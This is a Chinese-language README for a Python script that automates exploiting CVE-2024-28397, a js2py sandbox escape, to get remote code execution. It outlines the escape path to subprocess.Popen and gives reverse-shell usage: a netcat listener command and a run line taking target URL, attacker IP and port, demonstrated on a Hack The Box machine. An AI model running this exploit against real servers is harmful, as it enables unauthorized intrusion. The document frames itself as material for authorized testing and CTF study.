一个针对 js2py 沙箱逃逸 漏洞 (CVE-2024-28397) 的 Python 自动化利用脚本。该工具自动化了载荷生成与投递过程,以在易受攻击的实例上实现远程代码执行 (RCE)。
⚠️ 法律免责声明 在未获得对方事先同意的情况下使用此工具攻击目标是非法的。本仓库仅用于教育目的。作者不对任何滥用此信息的行为负责。此工具旨在用于授权的安全评估和夺旗赛 (CTF) 环境。
CVE-2024-28397 影响 js2py 库 (版本 < 0.74)。该库未能正确将 JavaScript 环境与主机 Python 环境隔离。
__class__ 和 __subclasses__ 属性。subprocess.Popen,从而在主机服务器上执行任意命令。pip install requests
启动你的 Netcat 监听器:
nc -lvnp 1337
运行脚本:
python3 exploit.py -u <目标 URL> -i <攻击者 IP> -p <攻击者端口>
以下是该工具针对一个易受攻击的目标 (Hack The Box - CodeTwo) 的实际操作:
运行漏洞利用脚本以生成载荷并触发回调:

在监听器上接收反弹 Shell:
